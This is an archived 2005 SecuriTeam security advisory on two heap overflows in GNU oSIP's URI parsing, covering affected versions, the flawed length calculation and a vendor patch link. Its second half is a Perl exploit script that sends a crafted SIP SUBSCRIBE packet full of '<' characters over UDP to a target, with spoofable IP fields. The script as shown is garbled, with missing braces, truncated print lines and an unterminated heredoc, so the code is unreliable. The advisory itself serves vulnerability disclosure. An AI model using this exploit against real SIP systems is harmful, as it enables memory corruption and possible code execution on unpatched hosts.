[NEWS] GNU oSIP URI Parsing Heap Overflows

From: SecuriTeam (support_at_securiteam.com)
Date: 04/17/05

  • Next message: SecuriTeam: "[TOOL] GLd - GreyList Daemon"
    To: list@securiteam.com
    Date: 17 Apr 2005 19:54:38 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.

    - - - - - - - - -

      GNU oSIP URI Parsing Heap Overflows


    Two exploitable heap overflows were discovered by Beyond Security's
    automated and innovative vulnerability discovering tool, beSTORM.

    beSTORM quickly discovered two exploitable heap overflows in GNU oSIP, an
    open source library implementation of SIP. These heap overflows can be
    used to overwrite arbitrary heap content and modify the execution path of
    the program once the library tries to free the allocated heap memory.


    Vulnerable Systems:
     * liboSIP version 2.0.6 and prior

    Immune Systems:
     * liboSIP version 2.0.7 or newer

    Technical Details:
    Inside the osip_uri.c file the function osip_uri_to_str() determines the
    size of the buffer to allocate by doing the following calculations:
      if (url->username != NULL)
        len = len + strlen(url->username) + 10; /* count escaped char */
      if (url->password != NULL)
        len = len + strlen(url->password) + 10;
    buf = (char *) osip_malloc (len);
      if (buf == NULL)
        return -1;
      tmp = buf;
      if (url->username != NULL)
          char *tmp2 = __osip_uri_escape_userinfo (url->username);

          sprintf (tmp, "%s", tmp2);
          osip_free (tmp2);
          tmp = tmp + strlen (tmp);

    However, the two calculations above do not take into account that the
    url->username and ur->password variables can contain characters that
    require escaping and that their eventual size requirement would be larger
    than strlen(url->username) + 10 and strlen(url->password) + 10

    For example, the username '<' (lower than) would get encoded into %3C,
    taking three times the length returned by strlen(url->username).

    Therefore, if an attacker provides 6 time the character '<' (lower than)
    the strlen() function would return 6, adding to it a value of 10 would
    result in the length of 16, while the encoded content's length would
    result in 6*3=18 meaning that we are overflowing the allocated space.

    The vendor has patched the latest version and has made a diff file of the
    <http://savannah.gnu.org/cgi-bin/viewcvs/osip/osip/src/osipparser2/osip_uri.c.diff?r1=1.5&r2=1.6> http://savannah.gnu.org/cgi-bin/viewcvs/osip/osip/src/osipparser2/osip_uri.c.diff?r1=1.5&r2=1.6

    About beSTORM:
    beSTORM can break apart a documented protocol, such as SIP, and generate
    millions of different attack vectors. The result is a comprehensive check
    of the protocol implementation and the resistance of the product to buffer
    overflow and similar remote attacks.

    beSTORM Against sipD:
    beSTORM's SIP testing module has been previously launched against another
    the open source product sipD. In that occasion beSTORM was able to detect
    the existence of two security vulnerabilities, a format string (
    http://www.securiteam.com/unixfocus/6R00G1595S.html) and denial of service
    ( <http://www.securiteam.com/unixfocus/6B00F0A95O.html>

    The following exploit was automatically generated by beSTORM based on the
    sequence required to trigger the vulnerabilities. We have consolidated the
    two different attacks - the username heap overflow and the password heap
    overflow into one script.

    #!/usr/bin/perl -w
    # Exploit generated by beSTORM on 2005-04-12 13:06
    # Copyright Beyond Security Ltd.

    use IO::Socket;
    use strict;

    my $target = shift;
    my $print_usage = 0;
    my $repeated_type = "<";

    if (!$target)

     print "No target has been supplied, reverting to\n";
     $target = "";

    my $repeating = shift;
    if (!$repeating )

     print "Repeating has not been supplied, reverting to 10.\n";
     $repeating = 10;

    my $attackerip = shift;
    if (!$attackerip)

     print "Attacker IP address has not been supplied, reverting to\n";
     $attackerip = "";

    my $attackedip = shift;
    if (!$attackedip)
     print "Contact IP address has not been supplied, reverting to\n";
     $attackedip = "";

    print "Will attack $target.\n";
    print "Attacker IP address defined as: $attackerip\n";
    print "Attacked IP address defined as: $attackedip\n";
    print "Will repeat '<' $repeating times\n";

    my $repeated_data = ($repeated_type x $repeating);
    my $target_port = 5060;

    my $packet =<<END;
    SUBSCRIBE sip:$repeated_data:$repeated_data\@$attackerip SIP/2.0\r
    To: <sip:$attackedip:$target_port>\r
    Via: SIP/2.0/UDP $attackedip:3277\r
    From: "STORM"<sip:$attackedip:3277>\r
    Call-ID: 1STORM9210\@$attackedip\r
    CSeq: 1 INVITE\r
    Max-Forwards: 70\r
    Contact: <sip:$attackerip:5059>\r

    print "Sending: [$packet]\n";

    socket(PING, PF_INET, SOCK_DGRAM, getprotobyname("udp"));

    my $ipaddr = inet_aton($target);
    my $sendto = sockaddr_in($target_port,$ipaddr);

    send(PING, $packet, 0, $sendto) == length($packet) or die "cannot send to
    $target : $target_port : $!\n";

    print "Done.\n";

    sub usage
     if ($print_usage) { return; }
     $print_usage = 1;
     print ("#"x50);
     print "\n";
     print "# $0 [hostname] [repeater] [attackerip] [attackedip]\n";
     print "# hostname\t-\tThe host the packet will be sent to.\n";
     print "# repeater\t-\tThe number of times the character will be sent
    (repeated character $repeated_type).\n";
     print "# attackerip\t-\tThe IP address from which the packet should
     print "\t\t\taddressed from (doesn't have to be your IP address).\n";
     print "# attackedip\t-\tThe IP address that you are contacting\n";
     print "\t\t\t(doesn't have to be the hostname IP's address).\n";
     print "\n";
     print "Results may vary depending on how the remote host handles
     print "For example:\n";
     print " * Some SIP Proxies won't look into packets addressed to it
    (attackedip or attackerip).\n";
     print " * Some SIP Routers won't handle packets that aren't addressed to
     print "etc\n";
     print "\n";


    The information has been provided by <mailto:beSTORM@securiteam.com>


    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com


    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

  • Next message: SecuriTeam: "[TOOL] GLd - GreyList Daemon"